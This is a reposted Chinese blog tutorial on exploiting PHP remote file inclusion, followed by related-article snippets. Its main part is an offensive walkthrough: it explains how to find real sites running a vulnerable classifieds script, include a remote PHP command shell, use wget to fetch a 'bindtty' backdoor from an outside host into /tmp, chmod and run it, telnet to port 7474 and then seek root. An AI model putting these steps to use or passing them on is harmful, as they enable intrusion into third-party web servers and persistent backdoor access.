php远程文件包含漏洞的前提是,PHP远程文件包含漏洞的利用

最新推荐文章于 2023-01-27 19:37:14 发布
最新推荐文章于 2023-01-27 19:37:14 发布
阅读量350 收藏 1
点赞数
文章标签: php远程文件包含漏洞的前提是

PHP远程文件包含漏洞的利用

by:CrAcKlOve

让我们先看看以下代码,Codz:

include($page);

?>

由于$page变量缺少充分过滤,判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量,以web权限执行远程文件.

2)漏洞的初步应用假设某一站点的index.php代码如下Codz:

include($page);

?>

我们就可以提交:http://siteurl.tld/index.php?page=h...服务器/文件名称假设我们远程文件名称为warez.php,内容为Codz:

system("ls /tmp/");

?>

这样就能把warez.php下载到本地,并且执行! 说白了,就是把tmp下的文件显示出来.

3)实战演练说了一大堆,现在开始锻炼实践能力了,嘿嘿.⑴准备工作:①存在远程文件包含漏洞的站点②phpshell③Backdoor

对于①,大家可以到www.cnns.net或者www.securiteam.com?..米罱腁rtmedic kleinanzeigen漏洞练手.Artmedic kleinanzeigen由于index.php的$site变量缺少过滤,导致了远程文件包含漏洞.所以我们可以提交以下urlhttp://Artmedic kleinanzeigen url/path/index.php?site=http://phpshellurl那如何找到使用Artmedic kleinanzeigen的站点呢?这里有个小技巧,我顺便说一下.我先去Artmedic kleinanzeigen的官方站找到Artmedic kleinanzeigen程序的演示,随便点了个连接,连接为http://siteurl.com/index.php?site=a...enmaerktestart,那些使用Artmedic kleinanzeigen的站就差不多出来了,我们可以一一去尝试!

对于②,我推荐Data Cha0s PHP Command/Safemode Exploit 4.1,或者angel的saphpshell,phpspy,功能都不错.

对于③,你可以使用绑定端口的程序bind,然后根据程序绑定的端口telnet.你可以使用san以前用过的Digit-Labs Connect-Back Backdoor,不过我经常使用bindtty,bindtty绑定7474端口.

⑵开始利用①提交http://xxx.de/index.php?site=http:/.../cse.gif?cmd=id说明一下,cse.gif是上文所说的Data Cha0s PHP Command/Safemode Exploit 4.1,cmd=id是查询当前用户的权限.一般所都是uid=99(nobody) gid=99(nobody) groups=99(nobody),uid不是0,所以他不是root级别的帐户.竟然可以执行,那么说明system函数没有被禁止,那我们就可以大胆的执行命令了!

②提交http://xxx.de/index.php?site=http:/...se.gif?cmd=wget http://phphot.com/bindtty -O /tmp/bindtty这样就把bindtty下载到tmp目录下.可能你会为,为什么要下到tmp目录下呢?因为tmp目录一般都可写.

③文件已经下载了,我们必须设置属性,不然运行不了,会提示没有权限.http://xxx.de/index.php?site=http:/...e.gif?cmd=chmod 775 /tmp/bindtty这样我们就有权限执行bindtty文件了!

④执行bindttyhttp://xxx.de/index.php?site=http:/...md=/tmp/bindtty成功的话,它会显示Daemon is starting...OK, pid = xxxx.因为上文已经说bindtty绑定的是7474端口,现在我们可以telnet host 7474.ps:不推荐使用windows命令提示符进行telnet,会出现字符混乱的现象,推荐使用putty.

⑤提升到root,这就是你的工作了.你可以根据cse.gif所显示的一些信息寻找对应的exploit进行提升权限.

这样就差不多结束了,有问题的话欢迎提出.

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

Filge
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP 网络开发详解之远程文件包含漏洞
12-18
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。 复制代码 代码如下: <?php $file_name = $_GET[“filename”]; //获得当前文件名 include(“$file_name “); //包含文件 //一些其他操作 ?> 这时,通过在地址栏上指定不同的文件名就可以实现包含不同文件并执行的功能。例如,通过在浏览器上访问http://localhost/test.php?filename=myinc.php就可以在代码(Code)中包含并执行myinc.php文件。 由于上面的代码(Code)没有进行任何错误处理,在浏览器上不加参数运行
php远程包含木马,文件包含漏洞之本地包含和远程包含
weixin_35700003的博客
03-19 488
文件包含漏洞介绍:程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞PHP中居多,而在JSP、ASP...
攻防世界 web php include,攻防世界-Web_php_include (四种解法)
weixin_36035466的博客
03-09 312
攻防世界-Web_php_include (考察的是文件包含)打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空str_replace()以其他字符替换字符串中的一些字符(区分大小写)strstr() 查找字符串首次出现的位置。返回字符串剩余部分}include($page);?>分析代码可知程序过滤掉了page=参数传入php://第一种方法(大小写绕过)大小...
PHP序列化以及反序列化系列[1]--PHP序列化格式的写法
weixin_30606461的博客
12-17 192
反序列化:对单一的已序列化的变量进行操作,将其转换回 PHP 的值(zval)。 PHP序列化方式 PHP在序列化的时候会将相应的变量以对应的键值进行储存。 将一个类序列化的话,处理代码主要的 文件:ext/standard/var.c 中,如下。 php_var_serialize_class()函数: static void php_var_serialize_class(smart...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
php 远程包含文件漏洞分析第1/6页
10-29
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这...
使用SMB共享来绕过php远程文件包含的限制执行RFI的利用
10-16
在本文中,我们将深入探讨如何利用PHP的远程文件包含(Remote File Inclusion,RFI)漏洞,即使在PHP环境中配置了禁止从HTTP/FTP URL包含文件的情况下。远程文件包含漏洞通常发生在应用程序允许用户输入用于决定要...
文件包含漏洞
weixin_48450741的博客
09-20 1620
文件包含漏洞 什么是文件包含 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含文件包含漏洞的成因 程序开发人员一般希望代码更灵活,所以将被包含文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞文件包含漏洞产生的条件 (1)文件包含漏洞利用前提条件: 1,web 应用采用 incl
Web安全领域的探索之远程文件包含漏洞(LFI)
Innocence_0的博客
01-18 1404
Web安全领域的探索之远程文件包含漏洞(LFI)
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 2154
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
ThinkPHP文件包含,远程执行漏洞分析
Fiverya的博客
12-13 1313
文件包含,代码执行漏洞漏洞编号:QVD-2022-46174
远程文件包含原理及利用
G3et的博客
01-27 716
远程文件包含漏洞的危害在于,攻击者可以通过包含恶意文件来执行任意代码,从而获取服务器的权限、控制服务器或窃取服务器上的敏感信息。为了防范远程文件包含漏洞,应当使用严格的输入验证和过滤机制,确保只允许包含受信任的文件。我们来复现一下,首先准备一个phpinfo,假设把这个phpinfo放到我们自己的服务器,或者上传一个图片马放在任何可以上传的地方等等,只要能访问就行。由于没有对用户提交的文件名进行任何的安全限制,所以攻击者可以通过提交远程服务器上的文件 URL 来包含并执行远程文件。先来看看正常的一个情况。
文件包含漏洞利用
qq_56327824的博客
04-27 3092
文件包含漏洞给是“代码注入”的一种,“代码注入”这种攻击,其原理就是注入一段用户能控制的脚本或代码,并让服务器执行 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节 省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接
远程文件包含漏洞利用
ncnynl的专栏
09-13 2035
远程文件包含漏洞利用 *****************************AuThor:CrAcKlOvE          **emA!l:CrAcKlOvE#zJ.cOM    **HoMePaGe:N/a,mAyBe DoWn   *****************************1)什么是远程文件包含漏洞?让我们先看看以下代码,inc
JSP--指令(page、include、taglib)详解
吴声子夜歌的博客
10-13 2632
JSP指令 为了设置JSP页面中的一些信息,Sun公司提供了JSP指令。JSP2.0 中共定义了page、include、taglib三种指令,每种指令都定义了各自的属性。 语法格式如下: <%@ directive attribute="value" %> 指令可以有很多个属性,它们以键值对的形式存在,并用逗号隔开。 JSP中三种指令标签: 指令 描述 <%@...
攻防世界-Web_php_include (四种解法)
笑花大王
01-20 4495
攻防世界-Web_php_include (考察的是文件包含) 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(区分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello'];...
page和include指令
Qiluluwawa的专栏
11-11 2047
Page指令和include指令 一.Page指令 1.page指令用于定义JSP页面的各种属性,无论page指令出现在JSP页面中的什么地方,它作用的都是整个JSP页面,为了保持程序的可读性和遵循良好的编程习惯,page指令最好是放在整个JSP页面的起始位置。 2、JSP 2.0规范中定义的page指令的完整语法: (1)、language="java":默认值是java语言; (2)
jsp中include和page指令的详解用法
热门推荐
低调的华丽 专栏
12-17 1万+
1.Include指令  该指令用于包含一个文本或代码的文件。  JSP语法:  例子:  include.jsp文件内容为:    Include指令测试    random.jsp中的随机显示的数为:        random.jsp文件中内容为:    在页面中显示为:  random.jsp中的随机显示的数为: 2148.093521070482  描述  Include指令在JSP文件
技术分享从浅入深学习PHP文件包含.pdf
最新发布
02-27
"这篇技术分享深入探讨了PHP文件包含功能,从基础概念到安全风险,包括各种包含函数的使用及其差异,以及本地文件包含和远程文件包含的概念。" 在PHP编程中,文件包含是一种非常重要的特性,允许开发者将代码分割...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值